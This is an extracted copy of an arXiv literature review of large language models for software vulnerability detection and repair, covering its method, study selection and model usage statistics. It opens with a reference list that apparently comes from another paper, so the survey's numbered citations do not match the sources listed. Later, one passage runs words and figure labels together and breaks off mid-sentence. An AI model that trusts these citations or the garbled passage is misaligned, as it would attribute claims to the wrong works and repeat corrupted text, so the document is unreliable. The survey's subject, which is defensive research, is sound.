[15] R. Pan, A. R. Ibrahimzada, R. Krishna, D. Sankar, L. P. Wassi, M. Merler, B. Sobolev, R. Pavuluri, S. Sinha, and R. Jabbarvand, "Understanding the effectiveness of large language models in code translation," arXiv preprint arXiv:2308.03109, 2023.
[16] S. Kang, J. Yoon, and S. Yoo, "Large language models are few-shot testers: Exploring llm-based general bug reproduction," in 2023 IEEE/ACM 45th International Conference on Software Engineering (ICSE). IEEE, 2023, pp. 2312-2323.
[17] D. Zan, B. Chen, F. Zhang, D. Lu, B. Wu, B. Guan, W. Yongji, and J.-G. Lou, "Large language models meet nl2code: A survey," in Proceedings of the 61st Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), 2023, pp. 7443-7464.
[18] C. Lemieux, J. P. Inala, S. K. Lahiri, and S. Sen, "Codamosa: Escaping coverage plateaus in test generation with pre-trained large language models," in International Conference on Software Engineering (ICSE), 2023.
[19] S. Khan and S. Parkinson, "Review into state of the art of vulnerability assessment using artificial intelligence," Guide to Vulnerability Analysis for Computer Networks and Systems, pp. 3-32, 2018.
[20] T. H. Le, H. Chen, and M. A. Babar, "A survey on data-driven software vulnerability assessment and prioritization," ACM Computing Surveys (CSUR), 2021.
[21] J. Fan, Y. Li, S. Wang, and T. N. Nguyen, "A c/c++ code vulnerability dataset with code changes and cve summaries," in Proceedings of the 17th International Conference on Mining Software Repositories, 2020, pp. 508-512.
[22] "Replication," 2024. [Online]. Available: https://github.com/vinci-grape/VulEmpirical
[23] A. Vaswani, N. Shazeer, N. Parmar, J. Uszkoreit, L. Jones, A. N. Gomez, Ł. Kaiser, and I. Polosukhin, "Attention is all you need," Advances in Neural Information Processing Systems, vol. 30, 2017.
[24] Z. Feng, D. Guo, D. Tang, N. Duan, X. Feng, M. Gong, L. Shou, B. Qin, T. Liu, D. Jiang et al., "Codebert: A pre-trained model for programming and natural languages," arXiv preprint arXiv:2002.08155, 2020.
[25] D. Guo, S. Ren, S. Lu, Z. Feng, D. Tang, S. Liu, L. Zhou, N. Duan, A. Svyatkovskiy, S. Fu et al., "Graphcodebert: Pre-training code representations with data flow," arXiv preprint arXiv:2009.08366, 2020.
[26] D. Guo, S. Lu, N. Duan, Y. Wang, M. Zhou, and J. Yin, "Unixcoder: Unified cross-modal pre-training for code representation," arXiv preprint arXiv:2203.03850, 2022.
[27] W. U. Ahmad, S. Chakraborty, B. Ray, and K.-W. Chang, "Unified pre-training for program understanding and generation," arXiv preprint arXiv:2103.06333, 2021.
[28] L. Ouyang, J. Wu, X. Jiang, D. Almeida, C. Wainwright, P. Mishkin, C. Zhang, S. Agarwal, K. Slama, A. Ray et al., "Training language models to follow instructions with human feedback," Advances in Neural Information Processing Systems, vol. 35, pp. 27730-27744, 2022.
[29] P. F. Christiano, J. Leike, T. Brown, M. Martic, S. Legg, and D. Amodei, "Deep reinforcement learning from human preferences," Advances in Neural Information Processing Systems, vol. 30, 2017.
[30] D. M. Ziegler, N. Stiennon, J. Wu, T. B. Brown, A. Radford, D. Amodei, P. Christiano, and G. Irving, "Fine-tuning language models from human preferences," arXiv preprint arXiv:1909.08593, 2019.
[31] J. Schulman, F. Wolski, P. Dhariwal, A. Radford, and O. Klimov, "Proximal policy optimization algorithms," arXiv preprint arXiv:1707.06347, 2017.
[32] Y. Bang, S. Cahyawijaya, N. Lee, W. Dai, D. Su, B. Wilie, H. Lovenia, Z. Ji, T. Yu, W. Chung et al., "A multitask, multilingual, multimodal evaluation of chatgpt on reasoning, hallucination, and interactivity," arXiv preprint arXiv:2302.04023, 2023.
[33] X. Zhou, T. Zhang, and D. Lo, "Large language model for vulnerability detection: Emerging results and future directions," in Proceedings of the 2024 ACM/IEEE 44th International Conference on Software Engineering: New Ideas and Emerging Results, 2024, pp. 47-51.
[34] M. Fu, C. K. Tantithamthavorn, V. Nguyen, and T. Le, "Chatgpt for vulnerability detection, classification, and repair: How far are we?" in 2023 30th Asia-Pacific Software Engineering Conference (APSEC). IEEE, 2023, pp. 632-636.
[35] C. MITRE, "Common vulnerabilities and exposures (cve)," 2023. [Online]. Available: https://cve.mitre.org/
[36] G. Bhandari, A. Naseer, and L. Moonen, "Cvefixes: automated collection of vulnerabilities and their fixes from open-source software," in Proceedings of the 17th International Conference on Predictive Models and Data Analytics in Software Engineering, 2021, pp. 30-39.
[37] Symantec, "securityfocus," 2023. [Online]. Available: https://www.securityfocus.com/
[38] Y. Zhou, S. Liu, J. Siow, X. Du, and Y. Liu, "Devign: Effective vulnerability identification by learning comprehensive program semantics via graph neural networks," in Proceedings of the 33rd International Conference on Neural Information Processing Systems, 2019, pp. 10197-10207.
[39] M. Fu and C. Tantithamthavorn, "Linevul: A transformer-based line-level vulnerability prediction," 2022.
[40] S. Cao, X. Sun, L. Bo, R. Wu, B. Li, and C. Tao, "Mvd: Memory-related vulnerability detection based on flow-sensitive graph neural networks," arXiv preprint arXiv:2203.02660, 2022.
[41] Z. Li, D. Zou, S. Xu, H. Jin, Y. Zhu, and Z. Chen, "Sysevr: A framework for using deep learning to detect software vulnerabilities," IEEE Transactions on Dependable and Secure Computing, 2021.
[42] X. Cheng, G. Zhang, H. Wang, and Y. Sui, "Path-sensitive code embedding via contrastive learning for software vulnerability detection," in Proceedings of the 31st ACM SIGSOFT International Symposium on Software Testing and Analysis, 2022, pp. 519-531.
[43] Y. Wu, D. Zou, S. Dou, W. Yang, D. Xu, and H. Jin, "Vulcnn: An image-inspired scalable vulnerability detection system," 2022.
[44] Z. Li, D. Zou, S. Xu, X. Ou, H. Jin, S. Wang, Z. Deng, and Y. Zhong, "Vuldeepecker: A deep learning-based system for vulnerability detection," in Proceedings of the 25th Annual Network and Distributed System Security Symposium, 2018.
[45] D. Hin, A. Kan, H. Chen, and M. A. Babar, "Linevd: Statement-level vulnerability detection using graph neural networks," arXiv preprint arXiv:2203.05181, 2022.
[46] X. Zhan, L. Fan, S. Chen, F. We, T. Liu, X. Luo, and Y. Liu, "Atvhunter: Reliable version detection of third-party libraries for vulnerability identification in android applications," in 2021 IEEE/ACM 43rd International Conference on Software Engineering (ICSE). IEEE, 2021, pp. 1695-1707.
[47] S. Chakraborty, R. Krishna, Y. Ding, and B. Ray, "Deep learning based vulnerability detection: Are we there yet," IEEE Transactions on Software Engineering, 2021.
[48] C. Ni, X. Yin, K. Yang, D. Zhao, Z. Xing, and X. Xia, "Distinguishing look-alike innocent and vulnerable code by subtle semantic representation learning and explanation," in Proceedings of the 31st ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering, 2023, pp. 1611-1622.
[49] B. Steenhoek, M. M. Rahman, R. Jiles, and W. Le, "An empirical study of deep learning models for vulnerability detection," in 2023 IEEE/ACM 45th International Conference on Software Engineering (ICSE). IEEE, 2023, pp. 2237-2248.
[50] B. Steenhoek, H. Gao, and W. Le, "Dataflow analysis-inspired deep learning for efficient vulnerability detection," in Proceedings of the 46th IEEE/ACM International Conference on Software Engineering, 2024, pp. 1-13.
[51] C. Ni, L. Shen, W. Wang, X. Chen, X. Yin, and L. Zhang, "Fva: Assessing function-level vulnerability by integrating flow-sensitive structure and code statement semantic," in 2023 IEEE/ACM 31st International Conference on Program Comprehension (ICPC). IEEE, 2023, pp. 339-350.
[52] A. Feutrill, D. Ranathunga, Y. Yarom, and M. Roughan, "The effect of common vulnerability scoring system metrics on vulnerability exploit delay," in 2018 Sixth International Symposium on Computing and Networking (CANDAR). IEEE, 2018, pp. 1-10.
[53] G. Spanos and L. Angelis, "A multi-target approach to estimate software vulnerability characteristics and severity scores," Journal of Systems and Software, vol. 146, pp. 152-166, 2018.
[54] T. H. M. Le, D. Hin, R. Croft, and M. A. Babar, "Deepcva: Automated commit-level vulnerability assessment with deep multi-task learning," in 2021 36th IEEE/ACM International Conference on Automated Software Engineering (ASE). IEEE, 2021, pp. 717-729.
[55] Z. Li, D. Zou, S. Xu, Z. Chen, Y. Zhu, and H. Jin, "Vuldeelocator: a deep learning-based fine-grained vulnerability detector," IEEE Transactions on Dependable and Secure Computing, 2021.
[56] Y. Li, S. Wang, and T. N. Nguyen, "Vulnerability detection with fine-grained interpretations," in Proceedings of the 29th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering, 2021, pp. 292-303.
[57] C. Ni, W. Wang, K. Yang, X. Xia, K. Liu, and D. Lo, "The best of both worlds: Integrating semantic features with expert features for defect prediction and localization," in Proceedings of the 2022 30th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering. ACM, 2022, pp. 672-683.
[58] C. Ni, K. Yang, X. Xia, D. Lo, X. Chen, and X. Yang, "Defect identification, categorization, and repair: Better together," arXiv preprint arXiv:2204.04856, 2022.
[59] Q. Zhang, Y. Zhao, W. Sun, C. Fang, Z. Wang, and L. Zhang, "Program repair: Automated vs. manual," arXiv preprint arXiv:2203.05166, 2022.
[60] Z. Chen, S. J. Kommrusch, M. Tufano, L.-N. Pouchet, D. Poshyvanyk, and M. Monperrus, "Sequencer: Sequence-to-sequence learning for end-to-end program repair," IEEE Transactions on Software Engineering, 2019.
[61] Q. Zhu, Z. Sun, Y.-a. Xiao, W. Zhang, K. Yuan, Y. Xiong, and L. Zhang, "A syntax-guided edit decoder for neural program repair," in Proceedings of the 29th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering, 2021, pp. 341-353.
[62] J. Sun, Z. Xing, H. Guo, D. Ye, X. Li, X. Xu, and L. Zhu, "Generating informative cve description from exploitdb posts by extractive summarization," ACM Transactions on Software Engineering and Methodology (TOSEM), 2022.
[63] H. Guo, S. Chen, Z. Xing, X. Li, Y. Bai, and J. Sun, "Detecting and augmenting missing key aspects in vulnerability descriptions," ACM Transactions on Software Engineering and Methodology (TOSEM), vol. 31, no. 3, pp. 1-27, 2022.
[64] H. Guo, Z. Xing, S. Chen, X. Li, Y. Bai, and H. Zhang, "Key aspects augmentation of vulnerability description based on multiple security databases," in 2021 IEEE 45th Annual Computers, Software, and Applications Conference (COMPSAC). IEEE, 2021, pp. 1020-1025.
[65] H. Guo, Z. Xing, and X. Li, "Predicting missing information of key aspects in vulnerability reports," arXiv preprint arXiv:2008.02456, 2020.
[66] G. Fan, R. Wu, Q. Shi, X. Xiao, J. Zhou, and C. Zhang, "Smoke: scalable path-sensitive memory leak detection for millions of lines of code," in 2019 IEEE/ACM 41st International Conference on Software Engineering (ICSE). IEEE, 2019, pp. 72-82.
[67] W. Li, H. Cai, Y. Sui, and D. Manz, "Pca: memory leak detection using partial call-path analysis," in Proceedings of the 28th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering, 2020, pp. 1621-1625.
[68] Z. Luo, C. Xu, P. Zhao, Q. Sun, X. Geng, W. Hu, C. Tao, J. Ma, Q. Lin, and D. Jiang, "Wizardcoder: Empowering code large language models with evol-instruct," arXiv preprint arXiv:2306.08568, 2023.
[69] A. Q. Jiang, A. Sablayrolles, A. Mensch, C. Bamford, D. S. Chaplot, D. d. l. Casas, F. Bressand, G. Lengyel, G. Lample, L. Saulnier et al., "Mistral 7b," arXiv preprint arXiv:2310.06825, 2023.
[70] "Phi-2: The surprising power of small language models," 2023. [Online]. Available: https://www.microsoft.com/en-us/research/blog/phi-2-the-surprising-power-of-small-language-models/
[71] "Hugging face open llm leaderboard," 2023. [Online]. Available: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard
[72] A. Z. Yang, C. Le Goues, R. Martins, and V. Hellendoorn, "Large language models for test-free fault localization," in Proceedings of the 46th IEEE/ACM International Conference on Software Engineering, 2024, pp. 1-12.
[73] J. Zhang, C. Wang, A. Li, W. Sun, C. Zhang, W. Ma, and Y. Liu, "An empirical study of automated vulnerability localization with large language models," arXiv preprint arXiv:2404.00287, 2024.
[74] A. Aghajanyan, B. Huang, C. Ross, V. Karpukhin, H. Xu, N. Goyal, D. Okhonko, M. Joshi, G. Ghosh, M. Lewis et al., "Cm3: A causal masked multimodal model of the internet," arXiv preprint arXiv:2201.07520, 2022.
[75] A. Paszke, S. Gross, F. Massa, A. Lerer, J. Bradbury, G. Chanan, T. Killeen, Z. Lin, N. Gimelshein, L. Antiga et al., "Pytorch: An imperative style, high-performance deep learning library," Advances in Neural Information Processing Systems, vol. 32, 2019.
[76] "Hugging face," 2023. [Online]. Available: https://huggingface.co
[77] J. Shieh, "Best practices for prompt engineering with openai api," OpenAI, https://help.openai.com/en/articles/6654000-best-practices-for-prompt-engineering-with-openai-api, 2023.
[78] Z. Ying, D. Bourgeois, J. You, M. Zitnik, and J. Leskovec, "Gnnexplainer: Generating explanations for graph neural networks," Advances in Neural Information Processing Systems, vol. 32, 2019.
[79] Y. Hu, S. Wang, W. Li, J. Peng, Y. Wu, D. Zou, and H. Jin, "Interpreters for gnn-based vulnerability detection: Are we there yet?" in Proceedings of the 32nd ACM SIGSOFT International Symposium on Software Testing and Analysis, 2023, pp. 1407-1419.
[80] C.-Y. Lin, "Rouge: A package for automatic evaluation of summaries," in Text Summarization Branches Out, 2004, pp. 74-81.
arXiv:2404.02525v3 [cs.SE] 7 Oct 2024

Large Language Model for Vulnerability Detection and Repair: Literature Review and the Road Ahead

XIN ZHOU, Singapore Management University, Singapore
SICONG CAO, Yangzhou University, China
XIAOBING SUN, Yangzhou University, China
DAVID LO, Singapore Management University, Singapore

The significant advancements in Large Language Models (LLMs) have resulted in their widespread adoption across various tasks within Software Engineering (SE), including vulnerability detection and repair. Numerous studies have investigated the application of LLMs to enhance vulnerability detection and repair tasks. Despite the increasing research interest, there is currently no existing survey that focuses on the utilization of LLMs for vulnerability detection and repair. In this paper, we aim to bridge this gap by offering a systematic literature review of approaches aimed at improving vulnerability detection and repair through the utilization of LLMs. The review encompasses research work from leading SE, AI, and Security conferences and journals, covering 43 papers published across 25 distinct venues, along with 15 high-quality preprint papers, bringing the total to 58 papers. By answering three key research questions, we aim to (1) summarize the LLMs employed in the relevant literature, (2) categorize various LLM adaptation techniques in vulnerability detection, and (3) classify various LLM adaptation techniques in vulnerability repair. Based on our findings, we have identified a series of limitations of existing studies. Additionally, we have outlined a roadmap highlighting potential opportunities that we believe are pertinent and crucial for future research endeavors.

CCS Concepts: • Security and privacy → Software and application security.

Additional Key Words and Phrases: Literature review, vulnerability detection, vulnerability repair, large language models

1 INTRODUCTION

A software vulnerability refers to a flaw or weakness in a software system that can be exploited by attackers. Recently, the number of software vulnerabilities has increased significantly [93], affecting numerous software systems. To mitigate these issues, researchers have proposed methods for automatic detection and repair of identified vulnerabilities. However, traditional techniques, such as rule-based detectors or program analysis-based repair tools, encounter challenges due to high false positive rates [85] and their inability to work for diverse types of vulnerabilities [128], respectively.

Recently, Large Language Models (LLMs) pre-trained on large corpora have demonstrated remarkable effectiveness across various natural language and software engineering tasks [37]. Given their recent success, researchers have proposed various LLM-based approaches to improve automated vulnerability detection and repair, demonstrating promising outcomes for both detection and repair tasks [88, 128]. LLM-based approaches for vulnerability detection and repair are increasingly attracting attention due to their potential to automatically learn features from known vulnerabilities and find/fix unseen ones. Furthermore, LLMs have the potential to utilize rich knowledge acquired from large-scale pre-training to enhance vulnerability detection and repair.
Fig. 1. Structure of This Survey:
- Background and Preliminary (§2)
- Review Methodology (§3)
- LLMs Used for Vulnerability Detection and Repair (§4)
- How to Adapt LLMs for Vulnerability Detection (§5)
  - Fine-tuning (§5.1): Data-centric Innovations [21, 45, 106, 115]; Combination of LLM with Program Analysis [56, 75, 95, 99, 107, 121]; Combination of LLM with Other Deep Learning Modules [41, 92, 113, 134]; Domain-specific Pre-training [21, 34, 56, 64, 90, 99]; Causal Learning [59]; Default Fine-tuning [16, 19, 26, 27, 46, 50, 81, 83, 87, 89, 94, 130]
  - Prompt Engineering (§5.2): Zero-shot Prompting [29, 43, 63, 76, 117, 119, 130, 132]; Few-shot Prompting [63, 130]
  - Retrieval Augmentation (§5.3) [22, 55, 105, 132]
- How to Adapt LLMs for Vulnerability Repair (§6)
  - Fine-tuning (§6.1): Data-Centric Innovations [12, 104, 128, 133]; Model-Centric Innovations [25, 38]; Domain-specific Pre-training [17, 18, 124, 128]; Reinforcement Learning [39]; Default Fine-tuning [27, 28]
  - Prompt Engineering (§6.2): Zero-shot Prompting [9, 69, 74, 102, 110]; Few-shot Prompting [29, 70]
- Characteristics of Datasets and Deployment (§7): Data Characteristics (§7.1); Deployment Strategies (§7.2)
- The Road Ahead (§8): Limitations (§8.1); Roadmap (§8.2)
Despite the increasing research interest in utilizing LLMs for vulnerability detection and repair, to the best of our knowledge, no comprehensive literature review has yet summarized the state-of-the-art approaches, identified the limitations of current studies, and proposed future research directions in this field. To effectively chart the most promising path forward for research on the utilization of LLM techniques in vulnerability detection and repair, we conducted a Systematic Literature Review (SLR) to bridge this gap, providing valuable insights to the community. In this paper, we collected 58 primary studies over the last 6 years (2018-2024). We then summarized the LLMs used in these studies, classified various techniques for adapting LLMs, and discussed the limitations of existing research. Finally, we proposed a roadmap outlining future research directions and opportunities in this area.

Related Literature Reviews. Researchers have undertaken a series of research endeavors concerning Machine Learning (ML) for source code vulnerability detection or repair [30, 37, 53, 109, 122]. Hou et al. [37] conducted a systematic literature review on LLMs for SE. Similarly, Zhang et al. [126] systematically reviewed the recent advancements in LLMs for SE. However, due to the extensive range of SE tasks to summarize, their reviews did not categorize the detailed utilization of LLMs in vulnerability detection and repair. In contrast, our literature review is more focused on vulnerability detection and repair. Ghaffarian et al. [30] studied vulnerability analysis and discovery approaches published till 2016. Lin et al. [53] reviewed vulnerability detection approaches utilizing deep learning till 2020. Wu et al. [109] investigated vulnerability detection approaches published before May 2022. However, their focus was not on LLMs, and they primarily covered general ML models such as recurrent neural networks. In contrast, our literature review includes papers published until March 2024 and focuses on LLMs, encompassing 37 distinct LLMs utilized in 58 relevant studies. Recently, Zhang et al. [123] reviewed learning-based automated program repair, which covered vulnerability repair as part of its study scope. Different from Zhang et al., our literature review is more focused on LLMs and vulnerability repair: we included more recent studies, offered a detailed categorization of LLM usages in vulnerability repair, and discussed specialized future directions for vulnerability repair with LLMs.

In general, this study makes the following contributions:
- We present a systematic review of 58 recent primary studies focusing on the utilization of LLMs for vulnerability detection and repair.
- We offer a comprehensive summary of the LLMs utilized in the relevant literature and categorize various techniques used to adapt LLMs to the two tasks (vulnerability detection and repair).
- We discuss the limitations of existing studies on using LLMs for vulnerability detection and repair and propose a roadmap outlining future research directions and opportunities.

Survey Structure. Figure 1 outlines the structure of this paper. Section 2 provides the background information, while Section 3 details the methodology. Section 4 discusses the LLMs employed in vulnerability detection and repair. Sections 5 and 6 cover the relevant work on adapting and enhancing LLMs for vulnerability detection and repair, respectively. Section 7 discusses the characteristics of datasets and deployment in LLM-based vulnerability detection and repair studies. Finally, Section 8 discusses the limitations of current studies and presents a roadmap for future research and opportunities.
2 BACKGROUND AND PRELIMINARIES

2.1 Vulnerability Detection/Repair Formulation
In this study, we focus on source code vulnerability detection and repair. Here, we present the task formulations of these two tasks.
Vulnerability Detection. Vulnerability detection is typically framed as a binary classification task: X_i → Y_i. Specifically, given an input source code function X_i, a model predicts whether the input function is vulnerable (Y_i = 1) or non-vulnerable (Y_i = 0).
Vulnerability Repair. Vulnerability repair studies using LLMs frame the task as a sequence-to-sequence problem: X_i → Y_i. Specifically, given a vulnerable code snippet X_i, an LLM generates the corresponding repaired code Y_i.
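To make the two framings concrete, the sketch below maps each onto off-the-shelf components; it is our illustration rather than the pipeline of any surveyed study, the checkpoint names are only examples, and the classification head is randomly initialized until fine-tuning (Section 5.1).

    from transformers import (AutoTokenizer, AutoModelForSequenceClassification,
                              AutoModelForSeq2SeqLM)
    import torch

    code = "int copy(char *d, char *s) { strcpy(d, s); return 0; }"  # X_i

    # Detection: X_i -> Y_i as binary classification (1 = vulnerable).
    det_tok = AutoTokenizer.from_pretrained("microsoft/codebert-base")
    detector = AutoModelForSequenceClassification.from_pretrained(
        "microsoft/codebert-base", num_labels=2)
    enc = det_tok(code, return_tensors="pt", truncation=True, max_length=512)
    with torch.no_grad():
        y = detector(**enc).logits.argmax(dim=-1).item()  # Y_i in {0, 1}

    # Repair: X_i -> Y_i as sequence-to-sequence generation.
    rep_tok = AutoTokenizer.from_pretrained("Salesforce/codet5-base")
    repairer = AutoModelForSeq2SeqLM.from_pretrained("Salesforce/codet5-base")
    out = repairer.generate(rep_tok(code, return_tensors="pt").input_ids,
                            max_length=256)
    fixed = rep_tok.decode(out[0], skip_special_tokens=True)  # Y_i (repaired code)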
2.2 Large Language Models (LLMs)
The term Large Language Model (LLM) was introduced to distinguish language models based on their parameter size, specifically referring to large-sized pre-trained language models [127]. However, the literature lacks a formal consensus on the minimum parameter scale for LLMs [100]. In this paper, we adopt the LLM scope division and taxonomy introduced by Pan et al. [73] and categorize the mainstream LLMs into three groups according to their architectures: 1) encoder-only, 2) encoder-decoder, and 3) decoder-only LLMs. We will provide a brief introduction to some representative LLMs for each category due to the space limit.
Encoder-only LLMs. Encoder-only LLMs are a type of neural network architecture that utilizes only the encoder component of the Transformer model [20]. In the SE domain, examples of encoder-only LLMs include CodeBERT [23], GraphCodeBERT [33], CuBERT [42], VulBERTa [34], CCBERT [131], SOBERT [36], and BERTOverflow [91].
Encoder-decoder LLMs. Encoder-decoder LLMs integrate both the encoder and decoder modules of the Transformer model [97]. The encoder processes the input sentence, while the decoder generates the target output text/code. Prominent examples of encoder-decoder LLMs include PLBART [10], T5 [79], CodeT5 [103], UniXcoder [32], and NatGen [14].
Decoder-only LLMs. Decoder-only LLMs exclusively utilize the decoder module of the Transformer model to generate the target output text/code. The GPT series, including GPT-2 [78], GPT-3 [13], GPT-3.5 [71], and GPT-4 [72], stands as a prominent implementation of this category. Additionally, in the SE domain, there are numerous decoder-only LLMs specialized for code as well. Examples include CodeGPT [58], Codex [15], Polycoder [111], Incoder [24], the CodeGen series [66, 68], Copilot [31], CodeLlama [60], and StarCoder [49].
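As a quick illustration of the three families, the snippet below loads one representative checkpoint per architecture with the Hugging Face transformers library; the checkpoint choices are our examples, not recommendations drawn from the surveyed studies.

    from transformers import AutoModel, AutoModelForSeq2SeqLM, AutoModelForCausalLM

    # Encoder-only: produces contextual embeddings (e.g., for classification heads).
    encoder_only = AutoModel.from_pretrained("microsoft/codebert-base")
    # Encoder-decoder: maps an input sequence to an output sequence.
    encoder_decoder = AutoModelForSeq2SeqLM.from_pretrained("Salesforce/codet5-base")
    # Decoder-only: autoregressive next-token generation.
    decoder_only = AutoModelForCausalLM.from_pretrained("Salesforce/codegen-350M-mono")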
3 REVIEW METHODOLOGY

3.1 Research Question
In this paper, we focus on investigating four Research Questions (RQs). The first three RQs mainly focus on identifying which LLMs are used and how they are adapted for vulnerability detection and repair:
• RQ1: What LLMs have been utilized to solve vulnerability detection and repair tasks?
• RQ2: How are LLMs adapted for vulnerability detection?
• RQ3: How are LLMs adapted for vulnerability repair?
The first three RQs pertain primarily to the model construction phase. Generally, the pipeline of a learning-based method can be divided into three phases: 1) data preparation, 2) model construction, and 3) deployment. We also investigate the characteristics of the datasets and deployment designs in LLM-based vulnerability detection and repair studies:
• RQ4: What are the characteristics of the datasets and deployment strategies in LLM-based vulnerability detection and repair studies?

3.2 Search Strategy
[Fig. 2. Study Identification and Selection Process]
As shown in Fig. 2, following the guide by Zhang et al. [120], our initial step is to identify primary studies to answer the research questions (RQs) above. Because the first LLM (i.e., BERT [20]) was introduced in 2018, our search focused on papers published from 2018 onwards (i.e., from January 2018 to March 2024). Next, we identified the top peer-reviewed and influential conference and journal venues in the domains of SE, AI, and Security. We included 13 conferences (ICSE, ESEC/FSE, ASE, ISSTA, CCS, S&P, USENIX Security, NDSS, AAAI, IJCAI, ICML, NIPS, ICLR) and 4 journals (TOSEM, TSE, TDSC, TIFS). After the manual searching, we identified 35 papers that were relevant to our research objectives.
In addition to manually searching primary studies from top-tier venues, we also conducted an automated search across 7 popular databases, including IEEE Xplore [3], ACM Digital Library [1], SpringerLink [5], Wiley [7], ScienceDirect [4], Web of Science [6], and arXiv [2]. The search string used in the automated search is crafted from the relevant papers identified in the manual search. Please kindly check the complete set of search keywords in our online appendix [8] due to the limited space. After conducting the automatic search, we collected 1,500 relevant studies from these 7 popular databases.

3.3 Study Selection
Inclusion and Exclusion Criteria. After the paper collection, we conducted a relevance assessment according to the following inclusion and exclusion criteria:
✓ The paper must be written in English.
✓ The paper must have an accessible full text.
✓ The paper must be a peer-reviewed full research paper published either in a conference proceeding or a journal.¹
✓ The paper must adopt LLM techniques to solve source code vulnerability detection or repair.
✗ The paper has less than 5 pages.
✗ Books, keynote records, panel summaries, technical reports, theses, tool demo papers, editorials, or venues not subject to a full peer-review process.
✗ The paper is a literature review or survey.
✗ Duplicate papers or similar studies authored by the same authors.
✗ The paper does not utilize LLMs, e.g., using graph neural networks.
✗ The paper mentions LLMs only in future work or discussions rather than using LLMs in the approach.
✗ The paper does not involve source code vulnerability detection or repair tasks.
¹ For preprint papers released on arXiv in 2023 or 2024 that are not yet published due to their recent release, we will retain them when checking the venues and will perform a manual quality check to decide whether to include them in our study.
[Fig. 3. Distribution of Publications per Year]
In the first phase, by filtering out short papers (exclusion criterion 1) and deduplication (exclusion criterion 4), the total number of included papers was reduced to 1,332. In the second phase, we manually examined the venue, title, and abstract of the papers, and the total number of included papers declined to 212. Please kindly note that, in this step, we retain preprint papers released on arXiv in 2023 or 2024 that are not yet published due to their recent release. Books, keynote records, panel summaries, technical reports, theses, tool demo papers, editorials, literature reviews, or survey papers were also discarded in this phase (exclusion criteria 2-3). In the third phase, we manually read the full text of each paper to remove irrelevant papers. Specifically, the vulnerability detection or repair papers which do not utilize LLMs but other methods, e.g., graph neural networks (GNN) or recurrent neural networks (RNN), were dropped (exclusion criterion 5). We also excluded studies that do not focus on source code vulnerability, such as those on binary code, protocols, or network communication. Furthermore, we removed studies that just discussed LLMs as an idea or future work (exclusion criterion 6). We also removed the papers focusing on other tasks rather than vulnerability detection or repair, such as vulnerable data generation, vulnerability assessment, etc. (exclusion criterion 7). After the third phase, we identified 82 primary studies directly relevant to our research topic.
Quality Assessment. To prevent biases introduced by low-quality studies, we formulated five Quality Assessment Criteria (QAC):
• QAC1: Was the study published in a prestigious venue?
• QAC2: Does the study make a contribution to the academic or industrial community?
• QAC3: Does the study provide a clear description of the workflow and implementation of the proposed approach?
• QAC4: Are the experiment details, including datasets, baselines, and evaluation metrics, clearly outlined?
• QAC5: Do the findings from the experiments strongly support the main arguments presented in the study?
We employed a scoring system ranging from 0 to 3 (poor, fair, good, excellent) for each quality assessment criterion. Following the manual assignment of scores, we selected papers with total scores reaching 12 (80% of the maximum possible score). Please note that for preprint papers released on arXiv in 2023 or 2024 that are not yet published, their score for the "venue" criterion is 0. However, if their total score reaches 12, we still consider them in our study. After this quality
Subsequently, interest in exploring LLMs for vulnerabilitydetectionandrepairhassteadilyincreased,peakingin2024,with46.6%ofthetotal studiedpapers.Thegrowingnumberofpapersonthesetopicsindicatesincreasingresearchinterest inleveragingLLMsforvulnerabilitydetectionandrepair.Wealsoanalyzedthepublicationvenues oftheincludedstudies.ICSEemergesasthepredominantconferencevenueforLLMstudieson vulnerabilitydetectionandrepair,contributing20.7%ofthetotalnumberofstudies.Othernotable venuesareTSE(5.2%),FSE(3.4%),EMSE(3.4%),ISSTA(3.4%),MSR(3.4%),andTOSEM(1.7%). 4 RQ1:WHATLLMSHAVEBEENUTILIZED? Ingeneral,outofthe58includedstudies,weidentified37distinctLLMsthathavebeenutilized. LLMsUsedforVulnerabilityDetection.Fig.4illustratesthedistributionoftheLLMsutilized forvulnerabilitydetection.PleasenotethatwecounttheoccurrenceofLLMsusedineachstudy, andasinglestudymayutilizemultipleLLMs.CodeBERT[23]emergesasthepredominantLLM inaddressingvulnerabilitydetectiontodate,representing26.1%(24/92)ofalltheuseofLLMs intheincludedstudies.GPT-3.5becomesthesecondmostfrequentlystudiedmodel,accounting for9.8%(9/92).RegardingthecategoriesofLLMs,encoder-onlyLLMscomprise47.8%(44/92)of the use of LLMs in the included studies. Following that, decoder-only LLMs account for 23.9% Others CodeBERT 27.2% 25 24 26.1% VulBERTa 3 3.3% 9 GPT-3.5 CodeLlama 4 9.8% 4.3% 4 GCodeBERT GPT-4 8 4.3% 7 8.7% Unixcoder 8 CodeT5 7.6% 8.7% Fig.4. DistributionofLLMsforVulnerabilityDetection
(22/92), and encoder-decoder LLMs constitute 9.8% (9/92). Lastly, commercial LLMs with undisclosed architectures, such as GPT-3.5 and GPT-4, account for 18.5% (17/92) of the LLM usages.
[Fig. 5. Distribution of LLMs for Vulnerability Repair: CodeT5 15.6% (7), GPT-3.5 11.1% (5), GPT-4 8.9% (4), Seq2seq 8.9% (4), CodeGen 6.7% (3), Codex 4.4% (2), PLBART 2.2% (1), Incoder 2.2% (1), Others 40.0% (18)]
LLMs Used for Vulnerability Repair. Fig. 5 illustrates the distribution of LLMs utilized for vulnerability repair. Unlike the detection task, CodeT5 [103] emerges as the predominant LLM in addressing vulnerability repair to date, representing 15.6% (7/45) of the use of LLMs in the included studies. GPT-3.5 is the second most frequently studied model, accounting for 11.1% (5/45). Following closely, GPT-4 and domain-specific pre-trained Seq2Seq Transformers are the third most frequently studied models, each accounting for 8.9% (4/45) of the use of LLMs. Regarding the categories of LLMs, decoder-only LLMs comprise 31.1% (14/45) of the LLMs used. Following that, encoder-decoder LLMs and encoder-only LLMs constitute 26.7% (12/45) and 6.7% (3/45) of the use of LLMs, respectively. Lastly, commercial LLMs with undisclosed architectures, such as GPT-3.5 and GPT-4, account for 35.6% (16/45) of the LLM usages.
